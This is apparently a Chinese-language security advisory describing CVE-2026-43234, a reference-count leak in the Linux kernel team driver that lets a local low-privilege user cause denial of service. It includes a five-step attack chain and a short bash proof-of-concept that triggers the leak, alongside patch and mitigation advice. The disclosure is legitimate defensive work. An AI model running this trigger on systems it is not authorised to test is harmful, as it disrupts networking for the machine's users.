CVE-2026-43234 CVSS 5.5 中危

CVE-2026-43234: Linux内核Team驱动拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43234

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的team网络驱动程序存在一个拒绝服务漏洞。该漏洞源于在注销从设备（unregistering slave）时错误地触发了NETDEV_CHANGEMTU事件，导致网络设备引用计数泄漏。本地低权限攻击者可利用此问题使设备处于等待释放状态，从而造成系统网络功能异常或拒绝服务。

技术细节

该漏洞位于Linux内核的team驱动实现中。当用户执行特定操作序列（如创建team设备、添加slave并更改其网络命名空间）时，驱动在移除slave的过程中会调用dev_set_mtu，进而触发NETDEV_CHANGEMTU通知链。由于设备此时处于注销流程，该事件导致inetdev_event等回调函数错误地增加了netdev的引用计数，却未在后续流程中释放。这种引用计数不平衡使得系统无法注销网络设备，触发“unregister_netdevice: waiting for ... to become free”错误，最终导致内存泄漏或拒绝服务。

攻击链分析

STEP 1

步骤1：环境准备

攻击者创建一个名为team1的team类型网络设备。

STEP 2

步骤2：添加从设备

创建一个dummy1接口，设置特定MTU（1499），并将其设置为team1的从设备。

STEP 3

步骤3：命名空间迁移

创建一个新的网络命名空间ns1，并将dummy1设备移动到该命名空间中。

STEP 4

步骤4：触发漏洞

在ns1命名空间中删除dummy1设备。此操作会触发team驱动的注销逻辑，进而错误地触发MTU变更事件。

STEP 5

步骤5：造成影响

由于引用计数泄漏，内核无法释放该网络设备资源，导致系统日志报错并可能引发网络子系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-43234: Linux Kernel Team Driver Refcount Leak
# Reproduce the usage count issue causing DoS

ip link add name team1 type team
ip link add name dummy1 mtu 1499 master team1 type dummy
ip netns add ns1
ip link set dev dummy1 netns ns1
ip -n ns1 link del dev dummy1

# Verify the vulnerability by checking dmesg
dmesg | grep "unregister_netdevice: waiting for"

影响范围

Linux Kernel (Mainline)

Linux Kernel (Stable branches prior to commit 5268892de70f)

防御指南

临时缓解措施

建议系统管理员尽快应用官方发布的内核补丁，修复team驱动中关于NETDEV_CHANGEMTU事件处理的逻辑错误。在未更新前，应严格限制本地用户的网络配置权限，避免不可信用户执行网络设备操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表